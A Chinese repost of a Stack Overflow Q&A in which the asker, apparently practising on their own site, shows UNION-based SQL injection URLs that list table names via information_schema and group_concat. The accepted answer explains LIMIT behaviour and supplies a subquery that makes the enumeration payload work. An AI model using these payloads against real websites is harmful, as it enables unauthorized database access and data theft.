gpt4 book ai didi

mysql - SQL 无法获得与 group_concat 一起使用的限制

转载 作者:行者123 更新时间:2023-11-29 20:32:48 56 4
gpt4 key购买 nike

所以我有一个网络服务器,我正在自己的网站上练习 SQLi 以获取个人知识,但我似乎无法弄清楚这部分。

到目前为止,我通过访问下面的 URL 找到了表名称

http://www.WEBSITE.com/about.php?id=-5+union+select+1,group_concat(table_name),3,4,5,6,7+FROM+information_schema.tables+WHERE+table_schema=database()--

但是,据我了解,group_concat() 最多只能输出 1024 个字符。

所以我在网上查看并尝试设置LIMIT,但没有成功。如果没有限制,我可以看到 20 个表的名称和 21 个表的一半名称。所以我输入

http://www.WEBSITE.com/about.php?id=-5+union+select+1,group_concat(table_name),3,4,5,6,7+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+21,1--

然后根本就没有任何表加载。有什么想法吗?

最佳答案

LIMIT 在分组之后应用于分组结果。也就是说,在包含 GROUP BY 子句并因此产生多个组的查询中,LIMIT 5 会将结果集限制为这些组中的前 5 个,但它不会以任何方式影响/限制组成每个组的记录数量。

根本没有为您加载任何内容的原因是因为 LIMIT 21,1 意味着您只需要从偏移量 21 开始的一条记录 - 并且因为(分组后)可能没有那么多组,您会得到一个空结果集。

您可以使用子查询来获取表名称,对其进行限制,然后然后分组:

SELECT GROUP_CONCAT(TABLE_NAME) FROM (
SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA = DATABASE()
LIMIT 1, 21
) t

但是,由于 UNION 正在为您工作,因此您似乎可以浏览多个结果 - 在这种情况下,为什么还要分组?

关于mysql - SQL 无法获得与 group_concat 一起使用的限制,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/38953035/

56 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com